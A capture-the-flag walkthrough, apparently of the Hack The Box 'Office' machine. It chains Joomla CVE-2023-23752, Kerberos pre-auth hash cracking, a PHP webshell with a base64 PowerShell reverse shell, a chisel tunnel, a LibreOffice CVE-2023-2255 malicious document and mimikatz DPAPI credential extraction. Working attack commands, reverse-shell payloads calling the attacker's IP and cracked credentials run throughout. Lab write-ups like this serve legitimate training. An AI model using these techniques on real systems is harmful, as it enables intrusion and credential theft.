Office

Recon

└─$ grep office /etc/hosts
10.10.11.3	office.htb	DC.office.htb	hostmaster.office.htb

DNS (53)

└─$ dig office.htb @10.10.11.3 any

; <<>> DiG 9.19.21-1-Debian <<>> office.htb @10.10.11.3 any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58559
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;office.htb.                    IN      ANY

;; ANSWER SECTION:
office.htb.             600     IN      A       10.10.11.3
office.htb.             600     IN      A       10.250.0.30
office.htb.             3600    IN      NS      dc.office.htb.
office.htb.             3600    IN      SOA     dc.office.htb. hostmaster.office.htb. 64 900 600 86400 3600

;; ADDITIONAL SECTION:
dc.office.htb.          3600    IN      A       10.10.11.3

;; Query time: 87 msec
;; SERVER: 10.10.11.3#53(10.10.11.3) (TCP)
;; WHEN: Mon Jun 17 16:19:28 EDT 2024
;; MSG SIZE  rcvd: 151

HTTP (80)

##### http://10.10.11.3/robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Only /administrator/ is valid, others are 404 or not listing directories.

Joomla Credentials

We know that Joomla is used.

└─$ joomscan -u office.htb | tee joomscan2.log
                        (1337.today)
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://office.htb ...

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 4.2.7

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://office.htb/administrator/components
http://office.htb/administrator/modules
http://office.htb/administrator/templates
http://office.htb/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://office.htb/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://office.htb/robots.txt

Interesting path found from robots.txt
http://office.htb/joomla/administrator/
http://office.htb/administrator/
...

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/office.htb/

Looking up the Joomla version we get CVE-2023-23752-EXPLOIT

└─$ py CVE-2023-23752.py -u http://office.htb
Coded By: K3ysTr0K3R --> Hug me ʕっ•ᴥ•ʔっ

[*] Checking if target is vulnerable
[+] Target is vulnerable
[*] Launching exploit against: http://office.htb
---------------------------------------------------------------------------------------------------------------
[*] Checking if target is vulnerable for usernames at path: /api/index.php/v1/users?public=true
[+] Target is vulnerable for usernames
[+] Gathering username(s) for: http://office.htb
[+] Username: Administrator
---------------------------------------------------------------------------------------------------------------
[*] Checking if target is vulnerable for passwords at path: /api/index.php/v1/config/application?public=true
[+] Target is vulnerable for passwords
[+] Gathering password(s) for: http://office.htb
...
[+] Password: H0lOgrams4reTakIng0Ver754!
...

The Administrator:H0lOgrams4reTakIng0Ver754! credentials didn't work for anything on web app.

Kerbrute

enum4linux failed because null auth is not valid for smb and RID bruteforce also wasn't successful. Only valid option left was kerbrute for usernames:

└─$ kerbrute userenum --dc dc.office.htb -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt | tee kerbrute.log

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 06/17/24 - Ronnie Flathers @ropnop

2024/06/17 17:17:12 >  Using KDC(s):
2024/06/17 17:17:12 >   dc.office.htb:88

2024/06/17 17:17:44 >  [+] VALID USERNAME:       administrator@office.htb
2024/06/17 17:21:31 >  [+] VALID USERNAME:       Administrator@office.htb
2024/06/17 17:23:22 >  [+] VALID USERNAME:       ewhite@office.htb
2024/06/17 17:23:22 >  [+] VALID USERNAME:       etower@office.htb
2024/06/17 17:23:22 >  [+] VALID USERNAME:       dwolfe@office.htb
2024/06/17 17:23:23 >  [+] VALID USERNAME:       dlanor@office.htb
2024/06/17 17:23:23 >  [+] VALID USERNAME:       dmichael@office.htb

└─$ cat kerbrute.log | grep VALID | awk '{print($7)}' | awk -F'@' '{print($1)}' > usernames.txt

└─$ netexec smb 10.10.11.3 -u usernames.txt -p 'H0lOgrams4reTakIng0Ver754!'
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
...
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!

Creds: dwolfe:H0lOgrams4reTakIng0Ver754!

We got valid user with credential from Joomla.

RID Brute

└─$ netexec smb office.htb --rid-brute -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!'

SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
SMB         10.10.11.3      445    DC               498: OFFICE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               500: OFFICE\Administrator (SidTypeUser)
SMB         10.10.11.3      445    DC               501: OFFICE\Guest (SidTypeUser)
SMB         10.10.11.3      445    DC               502: OFFICE\krbtgt (SidTypeUser)
SMB         10.10.11.3      445    DC               512: OFFICE\Domain Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               513: OFFICE\Domain Users (SidTypeGroup)
SMB         10.10.11.3      445    DC               514: OFFICE\Domain Guests (SidTypeGroup)
SMB         10.10.11.3      445    DC               515: OFFICE\Domain Computers (SidTypeGroup)
SMB         10.10.11.3      445    DC               516: OFFICE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               517: OFFICE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.3      445    DC               518: OFFICE\Schema Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               519: OFFICE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               520: OFFICE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.3      445    DC               521: OFFICE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               522: OFFICE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.3      445    DC               525: OFFICE\Protected Users (SidTypeGroup)
SMB         10.10.11.3      445    DC               526: OFFICE\Key Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               527: OFFICE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.3      445    DC               553: OFFICE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.3      445    DC               571: OFFICE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.3      445    DC               572: OFFICE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.3      445    DC               1000: OFFICE\DC$ (SidTypeUser)
SMB         10.10.11.3      445    DC               1101: OFFICE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.3      445    DC               1102: OFFICE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.3      445    DC               1106: OFFICE\Registry Editors (SidTypeGroup)
SMB         10.10.11.3      445    DC               1107: OFFICE\PPotts (SidTypeUser)
SMB         10.10.11.3      445    DC               1108: OFFICE\HHogan (SidTypeUser)
SMB         10.10.11.3      445    DC               1109: OFFICE\EWhite (SidTypeUser)
SMB         10.10.11.3      445    DC               1110: OFFICE\etower (SidTypeUser)
SMB         10.10.11.3      445    DC               1111: OFFICE\dwolfe (SidTypeUser)
SMB         10.10.11.3      445    DC               1112: OFFICE\dmichael (SidTypeUser)
SMB         10.10.11.3      445    DC               1113: OFFICE\dlanor (SidTypeUser)
SMB         10.10.11.3      445    DC               1114: OFFICE\tstark (SidTypeUser)
SMB         10.10.11.3      445    DC               1117: OFFICE\GPO Managers (SidTypeGroup)
SMB         10.10.11.3      445    DC               1118: OFFICE\web_account (SidTypeUser)
└─$ cat ridbrute.log | grep SidTypeUser | awk '{print($6)}' | awk -F'\\' '{print($2)}' > ../usernames2.txt

SMB

└─$ netexec smb office.htb -u dwolfe -p H0lOgrams4reTakIng0Ver754! --shares
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
SMB         10.10.11.3      445    DC               [*] Enumerated shares
SMB         10.10.11.3      445    DC               Share           Permissions     Remark
SMB         10.10.11.3      445    DC               -----           -----------     ------
SMB         10.10.11.3      445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.3      445    DC               C$                              Default share
SMB         10.10.11.3      445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.3      445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.3      445    DC               SOC Analysis    READ
SMB         10.10.11.3      445    DC               SYSVOL          READ            Logon server share
└─$ smbclient -U 'office.htb\dwolfe%H0lOgrams4reTakIng0Ver754!' '//office.htb/SOC Analysis'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed May 10 14:52:24 2023
  ..                                DHS        0  Wed Feb 14 05:18:31 2024
  Latest-System-Dump-8fbc124d.pcap      A  1372860  Sun May  7 20:59:00 2023

                6265599 blocks of size 4096. 1020044 blocks available
smb: \> get Latest-System-Dump-8fbc124d.pcap
getting file \Latest-System-Dump-8fbc124d.pcap of size 1372860 as Latest-System-Dump-8fbc124d.pcap (291.5 KiloBytes/sec) (average 291.5 KiloBytes/sec)

PCAP Analysis

First we look at Protocol Hierarchy from Statistics.

There's Kerberos packet found in pcap:

AS-REQ Roasting from a router.AS_REQ_Roast script

└─$ py as_req_roast.py ../CVE-2023-23752-EXPLOIT/Latest-System-Dump-8fbc124d.pcap office.htb
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

Crack the hash:

➜ .\hashcat.exe --show .\hashes
...
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
...
➜ .\hashcat.exe -m 19900 -a 0 .\hashes .\rockyou.txt
...
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a37765386f5fc:playboy69
...

└─$ netexec smb 10.10.11.3 -u usernames2.txt -p 'playboy69'
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
...
SMB         10.10.11.3      445    DC               [+] office.htb\tstark:playboy69

Joomla

The credentials still didn't work for anything, no winrm on box or Joomla.

But if we use Administrator:playboy69 to login into the Joomla we are logged in.

Joomla only has 1 user and email seems to have different domain.

Go to System > Site Templates

I usually go for 404 page since it's easier to trigger and hide backdoor in it.

Reverse Shell (web_account)

echo system($_REQUEST[0]);
--- or
system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==');

view-source:http://10.10.11.3/templates/cassiopeia/error.php?0=whoami

office\web_account

Catch the reverse shell and stabilize it.

The web_account doesn't have anything interesting, but there's tstark user on this system and we could try using RunasCs to run commands as him.

PS C:\Users> ls
    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         1/22/2024   9:22 AM                Administrator
d-----         1/18/2024  12:24 PM                HHogan
d-----         1/22/2024   9:22 AM                PPotts
d-r---         1/18/2024  12:29 PM                Public
d-----         1/18/2024  10:33 AM                tstark
d-----         1/22/2024   9:22 AM                web_account

Privilege Escalation (tstark)

PS C:\Users\Public> IWR -Uri 10.10.16.75/RunasCs.exe -OutFile rc.exe
PS C:\Users\Public> .\rc.exe tstark playboy69 powershell --logon-type 8 -r 10.10.16.75:4444
[*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '8'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type.
[*] Warning: The logon for user 'tstark' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9fcfb$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 912 created in background.
---
PS C:\Windows\system32> whoami
office\tstark
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

User.txt

PS C:\Windows\system32> cd $HOME
PS C:\Users\tstark> tree /f /a
Folder PATH listing
Volume serial number is C626-9388
C:.
+---Desktop
|       user.txt
|
+---Documents
+---Downloads
+---Favorites
+---Links
+---Music
+---OneDrive
+---Pictures
+---Saved Games
\---Videos
PS C:\Users\tstark> cat Desktop/user.txt
cat Desktop/user.txt
1656811f25cef42843e1d9f73513034e

Privilege Escalation (ppotts)

There's some application ran by apache on port 8083.

PS C:\xampp\apache\conf> cat httpd.conf | sls -notmatch '#'
Define SRVROOT "C:/xampp/apache"
ServerRoot "C:/xampp/apache"
Listen 80
Listen 8083
<VirtualHost *:8083>
    DocumentRoot "C:\xampp\htdocs\internal"
    ServerName localhost:8083
    <Directory "C:\xampp\htdocs\internal">
        Options -Indexes +FollowSymLinks +MultiViews
        AllowOverride All
        Require all granted
    </Directory>
    ErrorLog "logs/myweb-error.log"
    CustomLog "logs/myweb-access.log" combined
</VirtualHost>
---
PS C:\xampp\apache\conf> Get-Process -Name httpd
Get-Process -Name httpd

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    194      30     9872      20064              2928   0 httpd
    868      66   214084     182484              4136   0 httpd

PS C:\xampp\apache\conf> Get-NetTCPConnection -OwningProcess 2928

LocalAddress                        LocalPort RemoteAddress                       RemotePort State       AppliedSetting
------------                        --------- -------------                       ---------- -----       --------------
::                                  8083      ::                                  0          Listen
::                                  443       ::                                  0          Listen
::                                  80        ::                                  0          Listen
0.0.0.0                             8083      0.0.0.0                             0          Listen
0.0.0.0                             443       0.0.0.0                             0          Listen
10.10.11.3                          80        10.10.16.75                         34652      Established Internet
10.10.11.3                          80        10.10.16.75                         45244      Established Internet
0.0.0.0                             80        0.0.0.0                             0          Listen

Create tunnel to access the application on port 8083:

# Server
└─$ chisel server --reverse -p 8000

# Client 
PS C:\users\public> .\chisel.exe client 10.10.16.75:8000 R:8083:0.0.0.0:8083

Note: 0xdf: Tunneling with Chisel and SSF

HTTP (8083)

We have an upload form

PS C:\xampp\htdocs\internal> cat resume.php
<?php
$notifi = "";
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $stdname = trim($_POST["fullname"]);
    $email = str_replace(".", "-", $_POST["email"]);
    $experience = trim($_POST["experience"]);
    $salary = trim($_POST["salary"]);
    $department = trim($_POST["department"]);
    $rewritefn = strtolower(str_replace(" ", "-", "$stdname-$department-$salary $experience $email"));
    
    $filename = $_FILES["assignment"]["name"];
    $filetype = $_FILES["assignment"]["type"];
    $filesize = $_FILES["assignment"]["size"];
    $fileerr = $_FILES["assignment"]["error"];
    $filetmp = $_FILES["assignment"]["tmp_name"];
    chmod($_FILES["assignment"]["tmp_name"], 0664);
    // onigiri in .
    $ext = explode(".", $filename);
    //last piece of data from array
    $extension = strtolower(end($ext));
    $filesallowed = ["docm", "docx", "doc", "odt"];
    if (in_array($extension, $filesallowed)) {
        if ($fileerr === 0) {
            if ($filesize < 5242880) {
                $ff = "$rewritefn.$extension";
                $loc = "applications/" . $ff;
                if (move_uploaded_file($filetmp, $loc)) {
                    // upload successful
                    $notifi = "<span class=notifi>✔ Upload Successful!</span><hr/><style>button, input , select, option, h3{ display:none; } </style>";
                } else { echo $loc; $notifi = "<span class=notifi>✖️  Something Went Wrong! Unable To upload the Resume!</span><hr/>"; }
            } else { $notifi = "<span class=notifi>⚠️  Your Resume should be less than 5MB!</span><hr/>"; }
        } else { $notifi = "<span class=notifi>✖️  Corrupted File/Unable to Upload!</span><hr/>"; }
    } else { $notifi = "<span class=notifi>❌ Accepted File Types : Doc, Docx, Docm, Odt!</span><hr/>"; }
}
?>
...

This application only allows certain extension of files and uploads the final renamed files to C:\xampp\htdocs\internal\applications directory.

No direct write access to the directory.

PS C:\xampp\htdocs\internal> echo 'test' > applications/test
out-file : Access to the path 'C:\xampp\htdocs\internal\applications\test' is denied.
At line:1 char:1
+ echo 'test' > applications/test
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OpenError: (:) [Out-File], UnauthorizedAccessException
    + FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.OutFileCommand

Get versions:

PS C:\xampp\htdocs\internal> wmic product get caption,version # Took like a minute to complete...
Caption                                                         Version
Office 16 Click-to-Run Extensibility Component                  16.0.17126.20132
Office 16 Click-to-Run Licensing Component                      16.0.17126.20132
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332     14.32.31332
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332  14.32.31332
LibreOffice 5.2.6.2                                             5.2.6.2
DefaultPackMSI                                                  4.6.2.0
VMware Tools                                                    12.0.6.20104755

Teams Machine-Wide Installer                                    1.5.0.30767
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.29.30133  14.29.30133
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.29.30133     14.29.30133
Microsoft Search in Bing                                        2.0.2

Note: 3 easy ways to find out what Microsoft Word version you have on Windows

Get windows build version:

PS C:\xampp\htdocs\internal> cmd /c ver
Microsoft Windows [Version 10.0.20348.2322]

Welp, office doesn't seem to be exploitable. But LibreOffice on the other hand, yes: CVE-2023-2255

The php thingy wasn't working so I decided to use straight up reverse shell. Since we are on windows we need exe to get connection and didn't really want to use msfvenom. Golang is perfect for cross platform and that's what I used.https://github.com/gwillgues/reverse-shells/blob/742b83866b56/revshell.go

Compile:

GOOS=windows GOARCH=amd64 go build -o rev.exe rev.go

Create exploit:

└─$ python3 CVE-2023-2255.py --cmd 'C:\users\public\rev.exe 10.10.16.75 4444' --output 'pwn.odt'
File pwn.odt has been created !

Upload and wait, took some time to get connection back.

PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts

Privilege Escalation (hhogan)

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

PS C:\Program Files\LibreOffice 5\program> cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=MyTarget
    Type: Generic
    User: MyUser

    Target: Domain:interactive=office\hhogan
    Type: Domain Password
    User: office\hhogan
PS C:\Users\PPotts> vaultcmd /listcreds:"Windows Credentials" /all
Credentials in vault: Windows Credentials

Credential schema: Windows Domain Password Credential
Resource: Domain:interactive=office\hhogan
Identity: office\hhogan
Hidden: No
Roaming: No
Property (schema element id,value): (100,3)

The approach didn't work.

PS C:\Program Files\LibreOffice 5\program> runas /savecred /user:office\hhogan "C:\Users\Public\rev.exe 10.10.16.75 4444"
Enter the password for office\hhogan:

PS C:\Users\PPotts\appdata> ls Local\Microsoft\Credentials -hidden
PS C:\Users\PPotts\appdata> ls Roaming\Microsoft\Credentials -hidden

    Directory: C:\Users\PPotts\appdata\Roaming\Microsoft\Credentials

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          5/9/2023   2:08 PM            358 18A1927A997A794B65E9849883AC3F3E
-a-hs-          5/9/2023   4:03 PM            398 84F1CAEEBF466550F4967858F9353FB4
-a-hs-         6/19/2024   6:11 AM            374 E76CCA3670CD9BB98DF79E0A8D176F1E

I think meterpreter would have been nice here...

DPAPI

PS C:\Users\PPotts\appdata\Roaming\Microsoft\Credentials> \users\public\mimi.exe
mimikatz # dpapi::cred /in:.\18A1927A997A794B65E9849883AC3F3E
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 88fdf043461d4913a49680c2cf45e8e6
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : b68952824efb5374f396ef024b7f4f56
  dwDataLen          : 00000098 - 152
  pbData             : 0c1483543655e1eee285cb5244a83b72932723e88f937112d54896b19569be22aeda49f9aec91131dab8edae525506e7aa4861c98d67768350051ae93d9c493596d3e506fae0b6e885acd9d2a2837095d7da3f60d80288f4f8b8800171f26639df136e45eb399341ab216c81cf753aecc5342b6b212d85a46be1e2b45f6fcebd140755ec9d328c6d66a7bab635346de54fee236a63d20507
  dwSignLen          : 00000014 - 20
  pbSign             : 3a5e83bb958d713bfae523404a4de188a0319830

mimikatz # dpapi::cred /in:.\84F1CAEEBF466550F4967858F9353FB4
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 649c4466d5d647dd2c595f4e43fb7e1d
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 32e88dfd1927fdef0ede5abf2c024e3a
  dwDataLen          : 000000c0 - 192
  pbData             : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
  dwSignLen          : 00000014 - 20
  pbSign             : 21bfb22ca38e0a802e38065458cecef00b450976

mimikatz # dpapi::cred /in:.\E76CCA3670CD9BB98DF79E0A8D176F1E
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {44383fc6-6086-474c-9c42-608f07bb2a75}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : d33ec0375daf4846c706475c76bd4d97
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 573882097f4c42228690ad9bcf15ed33
  dwDataLen          : 000000a8 - 168
  pbData             : caabefdd39f36ac79548254a81e89402b6d7536d59dc69dd9cfa88b6798d7eed0e46c25b226830ae6a047f50906e6a85a94d99f29e38b4225580e30df820f69a9e369ef9f0aaffd3a7419de8a7703311986aa91e0d1721a5bf62331d4c142cf8d44094500db91534df3ade1a02f024ddaaf6b645d2863dae6e1648ad88ab509fc58083202f26ae905aa477621f0d816ca44d17e92e51a9da4a474f86bd9fa9fcdcb09959a0ea6e3e
  dwSignLen          : 00000014 - 20
  pbSign             : 3ffd24411ca2fdf276f0cc7451a9b187822a32cb
mimikatz # vault::list

Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
        Name       : Web Credentials
        Path       : C:\Users\PPotts\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        Items (0)

Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
        Name       : Windows Credentials
        Path       : C:\Users\PPotts\AppData\Local\Microsoft\Vault
        Items (1)
          0.    (null)
                Type            : {3e0e35be-1b77-43e7-b873-aed901b6275b}
                LastWritten     : 6/19/2024 6:11:51 AM
                Flags           : 00002004
                Ressource       : [STRING] Domain:interactive=office\hhogan
                Identity        : [STRING] office\hhogan
                Authenticator   :
                PackageSid      :
                *Authenticator* : [BYTE*]

                *** Domain Password ***

Master Keys:

PS C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107> ls -hidden

    Directory: C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         1/17/2024   3:43 PM            740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs-          5/2/2023   4:13 PM            740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs-         6/19/2024   5:01 AM            740 44383fc6-6086-474c-9c42-608f07bb2a75
-a-hs-          5/2/2023   4:13 PM            900 BK-OFFICE
-a-hs-         6/19/2024   5:01 AM             24 Preferred

Usually each master keys is an encrypted symmetric key that can decrypt other content. Therefore, extracting the encrypted Master Key is interesting in order to decrypt later that other content encrypted with it. src

PS C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107> \users\public\mimi.exe
mimikatz # dpapi::masterkey /in:.\10811601-0fa9-43c2-97e5-9bef8471fc7d /rpc
...
